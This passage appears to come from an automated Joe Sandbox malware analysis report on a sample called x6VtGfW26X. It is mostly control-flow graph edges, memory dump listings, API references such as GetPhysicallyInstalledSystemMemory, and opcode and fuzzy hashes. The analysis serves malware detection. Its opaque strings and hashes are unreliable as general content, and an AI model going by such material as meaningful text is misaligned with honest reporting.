7b7ee0 389->409 410 7d36a4-7d36bb 389->410 439 7d3500-7d3536 390->439 391->387 391->388 391->389 391->390 391->392 391->393 391->394 391->395 391->396 392->400 393->388 395->394 405 7d3670-7d3684 396->405 399->339 401->329 401->330 401->331 401->332 401->333 401->334 401->335 401->336 401->337 401->338 401->339 401->340 401->341 401->342 401->352 401->353 401->354 401->355 401->356 401->357 401->358 403->378 404->355 405->405 419 7d3686-7d3694 call 7d1060 405->419 409->406 420 7d36c0-7d36fc 410->420 433 7d3699-7d369c 419->433 420->420 429 7d36fe-7d3771 420->429 434 7d3780-7d3790 429->434 433->410 434->434 438 7d3792-7d37ab call 7d0c30 434->438 437->437 440 7d33af-7d33bd 437->440 438->408 439->439 442 7d3538-7d3543 439->442 443 7d33bf-7d33c4 440->443 444 7d33e1-7d33f0 440->444 446 7d3545-7d354f 442->446 447 7d3561-7d356f 442->447 451 7d33d0-7d33df 443->451 452 7d3411-7d341b call 7f0ba0 444->452 453 7d33f2-7d33f5 444->453 448 7d3550-7d355f 446->448 449 7d3591-7d35af call 7f0ba0 447->449 450 7d3571-7d3574 447->450 448->447 448->448 449->388 449->392 449->394 449->395 449->397 449->400 449->406 449->407 449->408 449->409 449->410 454 7d3580-7d358f 450->454 451->444 451->451 458 7d3420-7d3428 452->458 455 7d3400-7d340f 453->455 454->449 454->454 455->452 455->455 458->388 458->389 458->390 458->392 458->394 458->395 458->396 458->397 458->400 458->406 458->407 458->408 458->409 458->410
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: "0}$7x~$`*}
                                                                                        • API String ID: 0-4246718527
                                                                                        • Opcode ID: 23f8e4a537c1865d4b86cff61a3dee3897d27f572cdf9b182ab1da33b40fc564
                                                                                        • Instruction ID: b0acf392ecce038216823853203a2a760e3cb651ae1ad2453f4a78391ff77285
                                                                                        • Opcode Fuzzy Hash: 23f8e4a537c1865d4b86cff61a3dee3897d27f572cdf9b182ab1da33b40fc564
                                                                                        • Instruction Fuzzy Hash: 6A7235B2A18201CFD718CF68DC817AEB7B2FF84310F09856CE9459B395E7389911CB91
                                                                                        Function 007B95A0 Relevance: 9.1, Strings: 7, Instructions: 320COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 461 7b95a0-7b95ae 462 7b9985 461->462 463 7b95b4-7b961f call 7b5da0 call 7b7ed0 461->463 464 7b9987-7b9993 462->464 469 7b9620-7b9645 463->469 469->469 470 7b9647-7b9663 call 7b8ef0 469->470 473 7b9670-7b9684 470->473 473->473 474 7b9686-7b96a3 call 7b8ef0 473->474 477 7b96b0-7b96c4 474->477 477->477 478 7b96c6-7b96ef call 7b8ef0 477->478 481 7b96f0-7b971d 478->481 481->481 482 7b971f-7b9729 481->482 483 7b9730-7b9771 482->483 483->483 484 7b9773-7b978e call 7b8ef0 483->484 487 7b9790-7b97a4 484->487 487->487 488 7b97a6-7b986e call 7b9140 487->488 491 7b9870-7b9895 488->491 491->491 492 7b9897-7b989f 491->492 493 7b98c1-7b98cc 492->493 494 7b98a1-7b98a9 492->494 496 7b98ce-7b98d1 493->496 497 7b98f1-7b991f 493->497 495 7b98b0-7b98bf 494->495 495->493 495->495 498 7b98e0-7b98ef 496->498 499 7b9920-7b9946 497->499 498->497 498->498 499->499 500 7b9948-7b995d call 7bbf40 499->500 502 7b9962-7b9983 call 7b7ee0 500->502 502->464
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0E8C58279CAE175520A4C476FD51BCB1$96$ec$fg$m$t{$T
                                                                                        • API String ID: 0-930948990
                                                                                        • Opcode ID: 6dcb6d43adaa6f94e53f3e637eea1f2facc6b0d047bf91b09657135bb310932d
                                                                                        • Instruction ID: 3d5f513f3be39470bdb6b7345257de977c7c5eb0e458d4e10e09c47aa4351bce
                                                                                        • Opcode Fuzzy Hash: 6dcb6d43adaa6f94e53f3e637eea1f2facc6b0d047bf91b09657135bb310932d
                                                                                        • Instruction Fuzzy Hash: 46A1E4B02083808BD714DF65C895AABBFE5EFC2318F14496DE1E28B392D738C509CB56
                                                                                        Function 007DBE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 579 7dbe8a-7dbea6 580 7dbeb0-7dbf05 579->580 580->580 581 7dbf07-7dbf0e 580->581 582 7dc284 581->582 583 7dbf14-7dbf1b 581->583 585 7dc287-7dc2a5 582->585 584 7dbf20-7dbf29 583->584 584->584 586 7dbf2b 584->586 588 7dc2b0-7dc2dd 585->588 586->585 588->588 589 7dc2df-7dc2e6 588->589 590 7dc2e8-7dc2ef 589->590 591 7dc2fb-7dc307 589->591 592 7dc2f0-7dc2f9 590->592 593 7dc309-7dc30b 591->593 594 7dc321-7dc348 call 7ef450 591->594 592->591 592->592 595 7dc310-7dc31d 593->595 598 7dc34d-7dc38f GetPhysicallyInstalledSystemMemory 594->598 595->595 597 7dc31f 595->597 597->594 599 7dc390-7dc3e9 598->599 599->599 600 7dc3eb-7dc429 call 7cdc90 599->600 603 7dc430-7dc471 600->603 603->603 604 7dc473-7dc47a 603->604 605 7dc49d 604->605 606 7dc47c-7dc483 604->606 607 7dc4a0-7dc4aa 605->607 608 7dc490-7dc499 606->608 610 7dc4bd 607->610 611 7dc4ac-7dc4af 607->611 608->608 609 7dc49b 608->609 609->607 612 7dc4bf-7dc4ce 610->612 613 7dc4b0-7dc4b9 611->613 615 7dc4eb-7dc53a 612->615 616 7dc4d0-7dc4d7 612->616 613->613 614 7dc4bb 613->614 614->612 617 7dc540-7dc55e 615->617 618 7dc4e0-7dc4e9 616->618 617->617 619 7dc560-7dc567 617->619 618->615 618->618 620 7dc569-7dc56f 619->620 621 7dc57b-7dc588 619->621 622 7dc570-7dc579 620->622 623 7dc5ab-7dc661 621->623 624 7dc58a-7dc591 621->624 622->621 622->622 626 7dc662 623->626 625 7dc5a0-7dc5a9 624->625 625->623 625->625 626->626
                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007DC358
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: BVAI
                                                                                        • API String ID: 3960555810-2651495128
                                                                                        • Opcode ID: ea9cbbdc401c817d1f4bda8c2d4b11a5dd6168ab5a15d2cb04505befa33e7ea8
                                                                                        • Instruction ID: 10c2a4e9fcd5305fd83185231c2f9ad9169f61ee2b7d1803bc0351f710af0e26
                                                                                        • Opcode Fuzzy Hash: ea9cbbdc401c817d1f4bda8c2d4b11a5dd6168ab5a15d2cb04505befa33e7ea8
                                                                                        • Instruction Fuzzy Hash: 7CC1267160C3918BC72ACF2984503ABBFE1AFDA304F18496ED4C9D7392D7398906CB56
                                                                                        Function 007DC26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 631 7dc26c-7dc2a5 call 7e27d0 call 7b7ee0 637 7dc2b0-7dc2dd 631->637 637->637 638 7dc2df-7dc2e6 637->638 639 7dc2e8-7dc2ef 638->639 640 7dc2fb-7dc307 638->640 641 7dc2f0-7dc2f9 639->641 642 7dc309-7dc30b 640->642 643 7dc321-7dc348 call 7ef450 640->643 641->640 641->641 644 7dc310-7dc31d 642->644 647 7dc34d-7dc38f GetPhysicallyInstalledSystemMemory 643->647 644->644 646 7dc31f 644->646 646->643 648 7dc390-7dc3e9 647->648 648->648 649 7dc3eb-7dc429 call 7cdc90 648->649 652 7dc430-7dc471 649->652 652->652 653 7dc473-7dc47a 652->653 654 7dc49d 653->654 655 7dc47c-7dc483 653->655 656 7dc4a0-7dc4aa 654->656 657 7dc490-7dc499 655->657 659 7dc4bd 656->659 660 7dc4ac-7dc4af 656->660 657->657 658 7dc49b 657->658 658->656 661 7dc4bf-7dc4ce 659->661 662 7dc4b0-7dc4b9 660->662 664 7dc4eb-7dc53a 661->664 665 7dc4d0-7dc4d7 661->665 662->662 663 7dc4bb 662->663 663->661 666 7dc540-7dc55e 664->666 667 7dc4e0-7dc4e9 665->667 666->666 668 7dc560-7dc567 666->668 667->664 667->667 669 7dc569-7dc56f 668->669 670 7dc57b-7dc588 668->670 671 7dc570-7dc579 669->671 672 7dc5ab-7dc661 670->672 673 7dc58a-7dc591 670->673 671->670 671->671 675 7dc662 672->675 674 7dc5a0-7dc5a9 673->674 674->672 674->674 675->675
                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007DC358
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: BVAI
                                                                                        • API String ID: 3960555810-2651495128
                                                                                        • Opcode ID: 8713dbfb5a37f63f18dd26c68ce95171b1958bf502a42b2326497aa2e1a9438e
                                                                                        • Instruction ID: 6aff5612a4cc80f4458e5ccb7c59b8084867efa95c71db809ce4528c836cb7e1
                                                                                        • Opcode Fuzzy Hash: 8713dbfb5a37f63f18dd26c68ce95171b1958bf502a42b2326497aa2e1a9438e
                                                                                        • Instruction Fuzzy Hash: CEA1047160C3818BC72A8F2984507BBBFE1AF9A304F18496ED4C997392D7398906CB56
                                                                                        Function 007DC282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 676 7dc282-7dc2a5 678 7dc2b0-7dc2dd 676->678 678->678 679 7dc2df-7dc2e6 678->679 680 7dc2e8-7dc2ef 679->680 681 7dc2fb-7dc307 679->681 682 7dc2f0-7dc2f9 680->682 683 7dc309-7dc30b 681->683 684 7dc321-7dc38f call 7ef450 GetPhysicallyInstalledSystemMemory 681->684 682->681 682->682 685 7dc310-7dc31d 683->685 689 7dc390-7dc3e9 684->689 685->685 687 7dc31f 685->687 687->684 689->689 690 7dc3eb-7dc429 call 7cdc90 689->690 693 7dc430-7dc471 690->693 693->693 694 7dc473-7dc47a 693->694 695 7dc49d 694->695 696 7dc47c-7dc483 694->696 697 7dc4a0-7dc4aa 695->697 698 7dc490-7dc499 696->698 700 7dc4bd 697->700 701 7dc4ac-7dc4af 697->701 698->698 699 7dc49b 698->699 699->697 702 7dc4bf-7dc4ce 700->702 703 7dc4b0-7dc4b9 701->703 705 7dc4eb-7dc53a 702->705 706 7dc4d0-7dc4d7 702->706 703->703 704 7dc4bb 703->704 704->702 707 7dc540-7dc55e 705->707 708 7dc4e0-7dc4e9 706->708 707->707 709 7dc560-7dc567 707->709 708->705 708->708 710 7dc569-7dc56f 709->710 711 7dc57b-7dc588 709->711 712 7dc570-7dc579 710->712 713 7dc5ab-7dc661 711->713 714 7dc58a-7dc591 711->714 712->711 712->712 716 7dc662 713->716 715 7dc5a0-7dc5a9 714->715 715->713 715->715 716->716
                                                                                        APIs
                                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 007DC358
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                                        • String ID: BVAI
                                                                                        • API String ID: 3960555810-2651495128
                                                                                        • Opcode ID: 7c13657990b308339d9e6e9a0f7a1c7698b44028b55ed5181dae5573e2d6413b
                                                                                        • Instruction ID: 5c87267c2120f2648435eda0290b6a855652b32e4046b87d4d35edd84cb06d0a
                                                                                        • Opcode Fuzzy Hash: 7c13657990b308339d9e6e9a0f7a1c7698b44028b55ed5181dae5573e2d6413b
                                                                                        • Instruction Fuzzy Hash: A2A1F47160C3C18BC7268F2984507BBBFE1AF9A304F18496ED4C9D7392D7398906CB56
                                                                                        Function 007F0480 Relevance: 2.8, Strings: 2, Instructions: 345COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: =:;8$
                                                                                        • API String ID: 2994545307-3594289699
                                                                                        • Opcode ID: b239327eedcbc26b2a1bd79a12a4e58150824465470d9811463a6f4e923aad0d
                                                                                        • Instruction ID: 645c3db47392672b279f1e9641e1fcdda61040442332cb78fda197f3b791b88a
                                                                                        • Opcode Fuzzy Hash: b239327eedcbc26b2a1bd79a12a4e58150824465470d9811463a6f4e923aad0d
                                                                                        • Instruction Fuzzy Hash: 7BA14476B083148BDB249E64DC8067BB7E2ABD5310F19C53CDA8697346DA78EC05CBD2
                                                                                        Function 007D6000 Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Zysf${ts|
                                                                                        • API String ID: 2994545307-929106683
                                                                                        • Opcode ID: a25f2a83f1248426505a6c8d2074ffc486e7d9443ff9f0820ec7aa5993a231ee
                                                                                        • Instruction ID: cc2b8d784c64ce59ccdf0fd5e1ce1d31e75fe29fad7b65f31fdb2f7e78fac279
                                                                                        • Opcode Fuzzy Hash: a25f2a83f1248426505a6c8d2074ffc486e7d9443ff9f0820ec7aa5993a231ee
                                                                                        • Instruction Fuzzy Hash: A48128B1A083019BD724DE25DC81B3B77B6EBD5314F18C53EE58697392E63DAC04C292
                                                                                        Function 007BD6F8 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0E8C58279CAE175520A4C476FD51BCB1$]b
                                                                                        • API String ID: 0-2759662118
                                                                                        • Opcode ID: 6d85c81f6397d77a2e110971b25678f75bd5803d8e56d4aa6340c57ca0974431
                                                                                        • Instruction ID: a36e9cc274df799937c202541e240389274e469f1a95cf11049c9f99602a07eb
                                                                                        • Opcode Fuzzy Hash: 6d85c81f6397d77a2e110971b25678f75bd5803d8e56d4aa6340c57ca0974431
                                                                                        • Instruction Fuzzy Hash: 11617A76E153908BD320CB25CC517EFBBD2ABD5311F19C92CD8C9E7245DB3859018782
                                                                                        Function 007BC22D Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: uJ[L$yJ[L
                                                                                        • API String ID: 0-3296124075
